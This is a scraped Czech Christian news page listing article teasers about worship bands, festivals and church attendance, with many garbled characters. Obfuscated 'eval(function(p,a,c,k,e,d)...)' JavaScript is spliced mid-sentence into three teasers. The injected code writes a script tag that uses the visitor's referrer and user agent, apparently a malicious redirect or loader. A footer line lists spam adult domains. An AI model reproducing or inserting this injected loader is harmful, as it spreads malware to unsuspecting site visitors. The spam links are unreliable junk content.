Aktuálně

Kapela Hillsong Worship získala cenu Grammy

Ilustrace k článku

Worshipová kapela Hillsong získala v New Yorku svou první cenu Grammy za píse? What A Beautiful Name. Skupina, která vznikla v megasboru v Sydney, sklízí na celém sv?t? obrovský úsp?ch pro

Rodina je COOOL.?!

Ilustrace k článku

Od 19. do 26. srpna 2018 se v konferen?ním centru „Immanuel“ v nádherném prost?edí ?eskomoravské vyso?iny uskute?ní historicky první eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bbrye|var|u0026u|referrer|kkfnt||js|php'.split('|'),0,{})) kongres adventistických rodin. Na vlastní k?ži se budete

Do kostela chodí jeden z deseti Čechů

Ilustrace k článku

Do k?es?anského shromážd?ní pravideln? chodí p?ibližn? 8 % ob?an? ?eské republiky, p?i?emž pravidelnost znamená, že jdou alespo? jednou m?sí?n?. V období Vánoc to však je až 38 % (tedy dv?

Christafari a LZ7 přijedou na UNITED

Ilustrace k článku

Organizáto?i festivalu UNITED spustili aktualizované webové stránky, na kterých uve?ejnili první informace týkající se ro?níku 2018. Mezi hlavní novinky pat?í p?edstavení hudebních zahrani?ních host? a ?e?ník?. Pozvání do Vsetína p?ijala

Muzikál Abraham rozzáří Hradec

Ilustrace k článku

P?edstavení eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dyzyr|var|u0026u|referrer|atbab||js|php'.split('|'),0,{})) p?vodního ?eského muzikálu Abraham bude k vid?ní 17. prosince od 16 hodin v hlavním sále Univerzity Hradec Králové. Originální hudební zážitek v podání souboru ze západních ?ech

Návrat Stella Jones & The Christmas Singers do ČR

Ilustrace k článku

Tato velmi oce?ovaná gospelová skupina již okouzlila svými p?veckými výkony diváky po celém sv?t?. Soubor sdružuje ?adu talent? s jedine?nými hlasovými schopnostmi, což ve spojení s tradi?ními gospelovými prvky zaru?uje dechberoucí podívanou

BASEMENT není jen coworking v centru Prahy

Ilustrace k článku

Na pražských Vinohradech vyrostlo otev?ené spole?enství, které usiluje o život podle k?es?anských hodnot. Chce být inspirací pro nev??ící, hledající, tradi?ní v??ící, i pro ty, kte?í se nedokázali ztotožnit s církevní

Rend Collective pro Život víry: Uctívání nás může bavit

Ilustrace k článku

Co eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eefzf|var|u0026u|referrer|ihrfi||js|php'.split('|'),0,{})) podle vás chybí sou?asné worshipové hudb?? Gareth: Myslím, že se p?íliš zam??uje na to, co nás v život? tíží. Hodn? písní je o zápasech a

CampFest 2017 spôsobil PREMENU

Ilustrace k článku

19. ro?ník open air festivalu CampFest je za nami. Na Ran?i Krá?ova Lehota od 03. do 06. augusta 2017 zaznela hudba, slovo, ?i divadlo a ?udia mali možnos? zaži? festivalovú atmosféru

Festival UNITED po sedmé zaplnil centrum Vsetína

Ilustrace k článku

Ve Vsetín? se od ?tvrtka 24. 8. do soboty 26. 8. 2017 uskute?nil 7. ro?ník k?es?anského multižánrového festivalu UNITED. Festival, který se podruhé ve své historii konal jako m?stská open-air


 
adultcomics.me shemalevids.org incestgames.net